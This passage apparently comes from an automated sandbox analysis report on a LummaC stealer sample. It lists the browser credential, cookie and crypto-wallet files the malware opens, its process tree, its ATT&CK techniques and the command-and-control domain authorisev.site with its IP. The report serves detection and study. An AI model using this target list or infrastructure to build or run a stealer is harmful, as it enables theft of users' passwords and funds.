          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
          Source: Updater.exeBinary or memory string: WIN_81
          Source: Updater.exeBinary or memory string: WIN_XP
          Source: Updater.exeBinary or memory string: WIN_XPe
          Source: Updater.exeBinary or memory string: WIN_VISTA
          Source: is-7LJOT.tmp.3.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 15, 1USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
          Source: Updater.exeBinary or memory string: WIN_7
          Source: Updater.exeBinary or memory string: WIN_8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
          Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7552, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00BA23E0 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,35_2_00BA23E0
          Source: C:\Users\user\AppData\Local\hangbird\Updater.exeCode function: 35_2_00BA1DD8 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,35_2_00BA1DD8
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire Infrastructure2
          Valid Accounts
          21
          Windows Management Instrumentation
          1
          DLL Side-Loading
          1
          Exploitation for Privilege Escalation
          11
          Disable or Modify Tools
          1
          OS Credential Dumping
          2
          System Time Discovery
          Remote Services1
          Archive Collected Data
          3
          Ingress Tool Transfer
          Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts1
          Native API
          1
          Create Account
          1
          DLL Side-Loading
          11
          Deobfuscate/Decode Files or Information
          21
          Input Capture
          1
          Account Discovery
          Remote Desktop Protocol21
          Data from Local System
          21
          Encrypted Channel
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts2
          Command and Scripting Interpreter
          2
          Valid Accounts
          2
          Valid Accounts
          3
          Obfuscated Files or Information
          Security Account Manager12
          File and Directory Discovery
          SMB/Windows Admin Shares1
          Screen Capture
          3
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal Accounts1
          PowerShell
          Login Hook21
          Access Token Manipulation
          1
          DLL Side-Loading
          NTDS67
          System Information Discovery
          Distributed Component Object Model21
          Input Capture
          114
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
          Process Injection
          1
          Masquerading
          LSA Secrets141
          Security Software Discovery
          SSH3
          Clipboard Data
          Fallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
          Valid Accounts
          Cached Domain Credentials11
          Virtualization/Sandbox Evasion
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
          Virtualization/Sandbox Evasion
          DCSync4
          Process Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
          Access Token Manipulation
          Proc Filesystem1
          Application Window Discovery
          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
          Process Injection
          /etc/passwd and /etc/shadow3
          System Owner/User Discovery
          Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
          Remote System Discovery
          Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
          System Network Configuration Discovery
          Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1546641 Sample: file.exe Startdate: 01/11/2024 Architecture: WINDOWS Score: 100 80 authorisev.site 2->80 82 shed.dual-low.s-part-0017.t-0009.t-msedge.net 2->82 84 s-part-0017.t-0009.t-msedge.net 2->84 94 Suricata IDS alerts for network traffic 2->94 96 Found malware configuration 2->96 98 Yara detected LummaC Stealer 2->98 100 4 other signatures 2->100 13 file.exe 2 2->13         started        signatures3 process4 file5 78 C:\Users\user\AppData\Local\Temp\...\file.tmp, PE32 13->78 dropped 16 file.tmp 3 5 13->16         started        process6 file7 64 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 16->64 dropped 66 C:\Users\user\AppData\Local\...\_isdecmp.dll, PE32 16->66 dropped 19 file.exe 2 16->19         started        process8 file9 68 C:\Users\user\AppData\Local\Temp\...\file.tmp, PE32 19->68 dropped 22 file.tmp 5 15 19->22         started        process10 file11 70 C:\Users\user\AppData\Local\...\is-7LJOT.tmp, PE32 22->70 dropped 72 C:\Users\user\AppData\...\Updater.exe (copy), PE32 22->72 dropped 74 C:\Users\user\...\nvfvsdksvc_x64.exe (copy), PE32+ 22->74 dropped 76 7 other files (none is malicious) 22->76 dropped 25 Updater.exe 2 22->25         started        27 cmd.exe 1 22->27         started        29 cmd.exe 1 22->29         started        31 4 other processes 22->31 process12 process13 33 cmd.exe 1 25->33         started        36 conhost.exe 27->36         started        46 2 other processes 27->46 38 conhost.exe 29->38         started        48 2 other processes 29->48 40 conhost.exe 31->40         started        42 conhost.exe 31->42         started        44 conhost.exe 31->44         started        50 9 other processes 31->50 signatures14 90 Uses ping.exe to sleep 33->90 92 Uses ping.exe to check the status of other devices and networks 33->92 52 Updater.exe 1 33->52         started        55 PING.EXE 1 33->55         started        58 conhost.exe 33->58         started        process15 dnsIp16 102 LummaC encrypted strings found 52->102 60 MSBuild.exe 52->60         started        86 127.0.0.1 unknown unknown 55->86 signatures17 process18 dnsIp19 88 authorisev.site 104.21.85.194, 443, 49739, 49741 CLOUDFLARENETUS United States 60->88 104 Query firmware table information (likely to detect VMs) 60->104 106 Tries to harvest and steal browser information (history, passwords, etc) 60->106 108 Tries to steal Crypto Currency Wallets 60->108 signatures20

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          file.exe3%ReversingLabs
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\is-NDTIL.tmp\_isetup\_isdecmp.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\is-NDTIL.tmp\_isetup\_setup64.tmp0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\NVFTVRDLL64.dll (copy)0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\_isetup\_isdecmp.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\_isetup\_setup64.tmp0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\ddETWExternal.dll (copy)0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\is-5MQFH.tmp0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\is-E0D1D.tmp0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\is-EUGF2.tmp0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\nvfvsdksvc_x64.exe (copy)0%ReversingLabs
          C:\Users\user\AppData\Local\hangbird\Updater.exe (copy)0%ReversingLabs
          C:\Users\user\AppData\Local\hangbird\is-7LJOT.tmp0%ReversingLabs
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://ocsp.sectigo.com00%URL Reputationsafe
          http://ocsp.entrust.net030%URL Reputationsafe
          http://ocsp.entrust.net020%URL Reputationsafe
          http://www.indyproject.org/0%URL Reputationsafe
          https://www.remobjects.com/ps0%URL Reputationsafe
          http://subca.ocsp-certum.com020%URL Reputationsafe
          http://subca.ocsp-certum.com010%URL Reputationsafe
          https://www.innosetup.com/0%URL Reputationsafe
